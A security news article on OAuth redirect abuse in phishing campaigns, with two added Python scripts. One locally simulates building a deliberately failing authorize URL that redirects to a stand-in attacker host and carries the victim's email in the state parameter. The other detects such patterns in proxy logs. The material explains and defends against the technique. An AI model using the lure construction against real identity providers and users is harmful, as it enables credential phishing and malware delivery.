
OAuth redirection abuse enables phishing and malware delivery, Microsoft warns

Security researchers at Microsoft have reported phishing campaigns that abuse OAuth redirection mechanisms to deliver malware and redirect victims to attacker-controlled infrastructure. The activity demonstrates how threat actors can exploit legitimate authentication processes to bypass common email and browser security protections.

OAuth is an open authorization standard widely used by online services to allow users to sign in and grant applications access to their accounts without sharing passwords. The protocol enables identity providers to issue tokens that allow third-party services to access specific resources on a user’s behalf. Because the process relies on trusted authentication flows and redirection between services, it is frequently used across enterprise and cloud environments.

According to Microsoft's analysis, attackers are exploiting the error handling behavior built into OAuth authorization flows. Under the OAuth 2.0 specification, once an authorization request names a registered application and that application's registered redirect URI, most failures (an unrecognized scope, for instance) are not shown to the user on the identity provider's page but are reported by redirecting the browser to that redirect URI with an error code attached. An attacker who registers an application whose redirect URI points at infrastructure they control can therefore craft a link to the legitimate identity provider that deliberately fails and bounces the victim onward. The technique allows phishing pages or malware hosting infrastructure to appear as part of a normal login or authentication process, and the link the victim clicks carries the identity provider's trusted domain.

Researchers said the campaigns typically begin with phishing emails that encourage recipients to click on links related to workplace activity. Examples of these lures include invitations to view documents, recordings of meetings, electronic signature requests, or messages that appear to come from collaboration platforms. When victims click the link, they are routed through legitimate authentication endpoints before being redirected to malicious destinations.

In some cases, the redirect chain ultimately leads to malware delivery. Microsoft observed attacks distributing ZIP archives containing Windows shortcut (.lnk) files that execute PowerShell commands when opened. The commands perform reconnaissance on the infected system, collect information about the environment, and then deploy additional malicious components. The payloads may include installers that drop a decoy document to disguise the attack while a malicious DLL is loaded by a legitimate executable through DLL side-loading.

Other campaigns use the same redirect abuse technique to direct victims to adversary-in-the-middle (AiTM) phishing frameworks. These systems proxy the victim's login to the real service while intercepting the credentials and the resulting session cookies; because a captured session cookie already reflects a completed multi-factor authentication check, attackers can use it to gain access to the account even when multi-factor authentication is enforced.

Microsoft noted that attackers also manipulate parameters used in OAuth authentication requests. In some cases, threat actors encode the target's email address in the request's state parameter, which is intended to let an application correlate an authorization response with the request it sent. Because the identity provider echoes state back unchanged, including in error redirects, whatever the attacker placed in it arrives at the phishing page, where the email address is automatically populated in the login form, increasing the credibility of the prompt.
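To make the mechanism in the two paragraphs above concrete, here is an added illustration, not code from Microsoft's report or from this article, that simulates with the Python standard library what a standards-compliant identity provider does with a deliberately malformed authorization request. The IdP hostname idp.example, the two application registrations, the redirect URI https://attacker.example/landing and the victim address are all constructed for the example. The simulated provider follows the OAuth 2.0 authorization-code error rules (RFC 6749 section 4.1.2.1): a bad client_id or redirect_uri gets an error page and no redirect, while any other failure, such as an invalid scope, is reported by redirecting to the registered redirect_uri with error= and the original state echoed back. The last function shows how a state value carrying a base64-encoded email lets the landing page prefill its fake login form.

```python
"""Simulated OAuth 2.0 error redirect, per RFC 6749 section 4.1.2.1.

All hostnames, client IDs and the victim address below are constructed
for this illustration; nothing here talks to a real identity provider.
"""
import base64
from typing import Optional, Tuple
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed registry of applications the simulated identity provider knows.
# An attacker-registered app with an attacker-controlled redirect URI is the
# precondition for the redirect abuse described in the article.
REGISTERED_APPS = {
    "11111111-2222-3333-4444-555555555555": {
        "name": "Contoso Payroll",                  # constructed, legitimate app
        "redirect_uris": {"https://payroll.example/callback"},
    },
    "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee": {
        "name": "Document Viewer",                  # constructed, attacker app
        "redirect_uris": {"https://attacker.example/landing"},
    },
}
VALID_SCOPES = {"openid", "profile", "email", "offline_access"}


def build_lure_url(client_id: str, redirect_uri: str, victim_email: str) -> str:
    """Attacker side: an authorize URL on the *trusted* IdP host whose scope is
    deliberately invalid and whose state carries the victim's email address."""
    state = base64.urlsafe_b64encode(victim_email.encode()).decode().rstrip("=")
    query = urlencode({
        "client_id": client_id,
        "response_type": "code",
        "redirect_uri": redirect_uri,
        "scope": "this-scope-does-not-exist",    # forces the error path
        "state": state,
    })
    return f"https://idp.example/oauth2/authorize?{query}"


def idp_authorize(url: str) -> Tuple[int, str]:
    """IdP side: returns (status, Location). A bad client_id or redirect_uri
    yields an error page (no redirect); anything else, including an unknown
    scope, redirects to the registered redirect_uri with error= and state=."""
    q = {k: v[0] for k, v in parse_qs(urlparse(url).query).items()}
    app = REGISTERED_APPS.get(q.get("client_id", ""))
    redirect_uri = q.get("redirect_uri", "")
    if app is None or redirect_uri not in app["redirect_uris"]:
        return 400, ""                            # MUST NOT redirect here
    params = {}
    if q.get("state") is not None:
        params["state"] = q["state"]              # state is echoed back verbatim
    requested = set(q.get("scope", "").split())
    if not requested <= VALID_SCOPES:
        params["error"] = "invalid_scope"
        return 302, f"{redirect_uri}?{urlencode(params)}"
    if q.get("response_type") != "code":
        params["error"] = "unsupported_response_type"
        return 302, f"{redirect_uri}?{urlencode(params)}"
    # A well-formed request would continue to login/consent; not modelled here.
    params["code"] = "simulated-authorization-code"
    return 302, f"{redirect_uri}?{urlencode(params)}"


def landing_prefill(location: str) -> Optional[str]:
    """Attacker landing page: recover the email from the echoed state so the
    fake login form can be prefilled, as the article describes."""
    q = {k: v[0] for k, v in parse_qs(urlparse(location).query).items()}
    state = q.get("state")
    if not state:
        return None
    padded = state + "=" * (-len(state) % 4)
    try:
        return base64.urlsafe_b64decode(padded).decode()
    except (ValueError, UnicodeDecodeError):
        return None


def run_chain(victim_email: str = "alice@victim.example") -> dict:
    """Walk the chain: lure link -> trusted IdP -> attacker landing page."""
    lure = build_lure_url("aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
                          "https://attacker.example/landing", victim_email)
    status, location = idp_authorize(lure)
    loc_q = parse_qs(urlparse(location).query) if location else {}
    return {
        "lure_host": urlparse(lure).hostname,      # what the victim sees first
        "status": status,
        "landing_host": urlparse(location).hostname if location else None,
        "error": loc_q.get("error", [None])[0],
        "prefilled_email": landing_prefill(location) if location else None,
    }


if __name__ == "__main__":
    print(run_chain())
```

The point to notice is that the simulated provider behaves correctly throughout: the only attacker-controlled inputs are the application registration and the request parameters, which is why blocking the link by its domain does not work and why the recommendations later in the article focus on the applications themselves.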

The company said the campaigns illustrate how attackers are shifting tactics as organizations strengthen defenses against credential theft and multi-factor authentication bypass. Instead of directly stealing passwords, adversaries are increasingly targeting trust relationships and protocol behavior within widely used identity systems.

Microsoft recommends that organizations monitor OAuth application activity, review the redirect URIs configured on registered applications, and restrict user consent to risky or unknown applications. Security teams are also advised to monitor unusual authentication flows, such as authorization requests that end in error redirects to unfamiliar hosts, and to educate users about suspicious links that may appear to originate from legitimate services.
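For the monitoring advice above, here is an added example, again not from Microsoft or this article, of the kind of check a security team can run over URL-bearing telemetry such as proxy logs or the click logs of a URL-rewriting email gateway. The log lines, the IdP host, the client allowlist and the approved redirect domains are constructed for the example. The heuristics follow the article's description: an authorize request to the trusted IdP whose client_id is not on the organization's allowlist or whose redirect_uri points outside an approved domain, a state value that decodes to an email address, and an OAuth error response (error= with state=) arriving at a host that is not an approved redirect target.

```python
"""Flag suspicious OAuth authorization requests and error redirects in URL
telemetry. Log lines, hosts and allowlists are constructed examples."""
import base64
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlparse

IDP_HOSTS = {"idp.example"}                                      # constructed
APPROVED_CLIENT_IDS = {"11111111-2222-3333-4444-555555555555"}  # constructed
APPROVED_REDIRECT_DOMAINS = {"payroll.example", "intranet.example"}
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")

# Constructed proxy log lines: "<timestamp> <user> <method> <url>".
# The second line's state is base64 of "bob@victim.example".
SAMPLE_LOG = """\
2025-01-15T09:01:02Z alice GET https://idp.example/oauth2/authorize?client_id=11111111-2222-3333-4444-555555555555&response_type=code&redirect_uri=https://payroll.example/callback&scope=openid&state=abc123
2025-01-15T09:02:10Z bob GET https://idp.example/oauth2/authorize?client_id=aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee&response_type=code&redirect_uri=https://attacker.example/landing&scope=bogus&state=Ym9iQHZpY3RpbS5leGFtcGxl
2025-01-15T09:02:11Z bob GET https://attacker.example/landing?error=invalid_scope&state=Ym9iQHZpY3RpbS5leGFtcGxl
2025-01-15T09:05:00Z carol GET https://intranet.example/docs/report.pdf
"""


def decode_state_email(state: Optional[str]) -> Optional[str]:
    """Return the address if the state parameter is base64 of an email."""
    if not state:
        return None
    padded = state + "=" * (-len(state) % 4)
    try:
        text = base64.urlsafe_b64decode(padded).decode()
    except (ValueError, UnicodeDecodeError):
        return None
    return text if EMAIL_RE.match(text) else None


def classify_url(url: str) -> List[str]:
    """Return the findings for one URL (empty list when nothing looks odd)."""
    u = urlparse(url)
    q = {k: v[0] for k, v in parse_qs(u.query).items()}
    findings = []
    if u.hostname in IDP_HOSTS and u.path.endswith("/authorize"):
        if q.get("client_id") not in APPROVED_CLIENT_IDS:
            findings.append("authorize request for non-allowlisted client_id")
        ru_host = urlparse(q.get("redirect_uri", "")).hostname or ""
        if ru_host and ru_host not in APPROVED_REDIRECT_DOMAINS:
            findings.append(f"redirect_uri outside approved domains ({ru_host})")
        if decode_state_email(q.get("state")):
            findings.append("state parameter carries an email address")
    elif "error" in q and u.hostname not in APPROVED_REDIRECT_DOMAINS:
        # The tail of the chain: the IdP's error redirect landing off-estate.
        findings.append(f"OAuth error response ({q['error']}) delivered to unapproved host")
        if decode_state_email(q.get("state")):
            findings.append("state parameter carries an email address")
    return findings


def scan_log(log: str) -> List[Tuple[str, str, List[str]]]:
    """Return (user, url, findings) for every log line with a finding."""
    hits = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue                       # malformed line, skip it
        user, url = parts[1], parts[3]
        findings = classify_url(url)
        if findings:
            hits.append((user, url, findings))
    return hits


if __name__ == "__main__":
    for user, url, findings in scan_log(SAMPLE_LOG):
        print(user, url)
        for f in findings:
            print("   -", f)
```

In practice the client_id allowlist would come from the tenant's application inventory, and the two findings for the same user a second apart (the authorize request and the error redirect) are the pattern worth correlating, since either line alone is easy to dismiss.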

The findings highlight the challenges of defending against attacks that rely on trusted infrastructure and standards-compliant behavior. Because the malicious activity occurs within legitimate authentication flows, it can blend into normal enterprise traffic and evade traditional phishing detection tools.